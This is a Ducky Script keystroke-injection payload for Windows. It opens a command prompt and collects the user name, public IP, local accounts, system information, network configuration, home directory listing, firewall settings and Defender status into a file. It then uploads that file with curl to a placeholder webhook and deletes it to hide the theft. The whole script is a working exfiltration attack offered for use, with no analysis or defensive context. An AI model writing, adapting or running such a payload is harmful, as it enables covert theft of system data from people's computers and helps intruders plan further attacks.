GUI r
DELAY 500
STRING cmd.exe
ENTER
DELAY 500
STRING cd %HOMEPATH%
ENTER
STRING whoami > slimmerkimmer.txt
ENTER
STRING curl ident.me >> slimmerkimmer.txt
ENTER
STRING net users >> slimmerkimmer.txt
ENTER
STRING echo --------------------------------------------------- >> slimmerkimmer.txt
ENTER
STRING systeminfo >> slimmerkimmer.txt
ENTER
STRING echo --------------------------------------------------- >> slimmerkimmer.txt
ENTER
STRING ipconfig /all >> slimmerkimmer.txt
ENTER
STRING echo --------------------------------------------------- >> slimmerkimmer.txt
ENTER
STRING dir %HOMEPATH% >> slimmerkimmer.txt
ENTER
STRING echo --------------------------------------------------- >> slimmerkimmer.txt
ENTER
STRING netsh firewall show config >> slimmerkimmer.txt
ENTER
STRING echo --------------------------------------------------- >> slimmerkimmer.txt
ENTER
STRING sc query windefend >> slimmerkimmer.txt
ENTER
STRING echo --------------------------------------------------- >> slimmerkimmer.txt
ENTER
STRING curl.exe -F "payload_json={\"username\": \"Daddy got that LOOT\", \"content\": \"Get this shit written down\"}" -F "file=@slimmerkimmer.txt" YOUR WEBHOOK
ENTER
STRING del slimmerkimmer.txt
ENTER
STRING exit
ENTER

